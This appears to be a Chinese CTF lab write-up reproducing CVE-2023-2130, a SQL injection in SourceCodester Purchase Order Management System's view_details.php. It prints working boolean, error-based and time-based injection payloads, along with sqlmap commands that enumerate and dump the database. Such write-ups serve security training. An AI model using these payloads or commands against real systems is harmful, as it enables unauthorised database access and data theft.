当前位置: 首页 > news >正文

【春秋云镜】CVE-2023-2130漏洞复现exp

news 来源:原创 2025/6/10 5:16:04

目录标题

    • 漏洞介绍
    • EXP
    • 漏洞复现

漏洞介绍

​ 在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

影响版本

SourceCodester采购订单管理系统1.0

EXP

sqlmap

Parameter: id (GET)Type: boolean-based blind   #布尔盲注Title: AND boolean-based blind - WHERE or HAVING clausePayload: id=1' AND 8712=8712 AND 'qmcT'='qmcTType: error-based        #报错注入Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=1' OR (SELECT 1285 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,(SELECT (ELT(1285=1285,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OHDM'='OHDM#floor():利用 GROUP BY 分组时的随机数冲突,触发错误Type: time-based blind    #时间盲注Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=1' AND (SELECT 4238 FROM (SELECT(SLEEP(5)))KfhW) AND 'apvD'='apvD

漏洞复现

一个登录框

image-20250609181808222

抓包登录,回显有内容

image-20250609182129426

存在sql查询语句

查找users表下username=admin,且password=132456的md5值的结果

{"status":"incorrect","last_qry":"SELECT * from users where username = 'admin' and password = md5('132456') "}

访问该路径

http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php

跟上id参数后出现回显,调用了数据库信息

image-20250609183131478

简单测了一下,单引号存在注入,**–+**可以注释

image-20250609183257707

使用sqlmap去跑,跑数据库

┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --dbs 
available databases [4]:
[*] information_schema 
[*] mysql
[*] performance_schema
[*] purchase_order_db

爆数据表

┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db --tables
+---------------+
| fllllaaaag    |
| item_list     |
| order_items   |
| po_list       |
| supplier_list |
| system_info   |
| users         |
+---------------+

fllllaaaag表下的数据

┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag --dump

或者爆fllllaaaag表下的列

┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag --columns
+--------+---------+
| Column | Type    |
+--------+---------+
| flag   | text    |
| id     | int(20) |
+--------+---------+

然后再爆破具体的内容

┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag -C flag --dump

flag

flag{ae8dbccb-c588-434a-9da6-e4fd3e9d8f1d}

相关文章:

  • 如何把工业通信协议转换成http websocket
  • UFW防火墙安全指南
  • 《C++初阶之入门基础》【普通引用 + 常量引用 + 内联函数 + nullptr】
  • Hive 存储格式深度解析:从 TextFile 到 ORC,如何选对数据存储方案?
  • 在Zenodo下载文件 用到googlecolab googledrive
  • Excel 怎么让透视表以正常Excel表格形式显示
  • WebRTC(一):整体架构
  • 基于深度学习的图像分割技术:原理、应用与实践
  • ES6(ES2015)特性全解析
  • Shell 解释器​​ bash 和 dash 区别
  • laravel8+vue3.0+element-plus搭建方法
  • composer init
  • 香港虚拟主机安装WordPress
  • Maotu流程图编辑器:Vue3项目中的集成实战与自定义流程开发指南
  • 基于 CNN-SHAP 分析卷积神经网络的多分类预测【MATLAB】
  • JS红宝书10.1-10.5 函数
  • JS - 函数防抖详解
  • 从零开始的python学习(八)P108+P109+P110+P111+P112+P113+P114
  • 提升移动端网页调试效率:WebDebugX 与常见工具组合实践
  • WebGL与Three.js:从基础到应用的关系与原理解析
  • 网站建设 佛山市/引流推广是什么意思
  • 纹身网站建设/微营销平台有哪些
  • 做外贸网站推广/广州百度seo
  • 教育网站建设的策划方案/网络销售培训
  • 手机app开发网站/seo权重优化
  • 网站开发顶岗实习报告/站长工具官网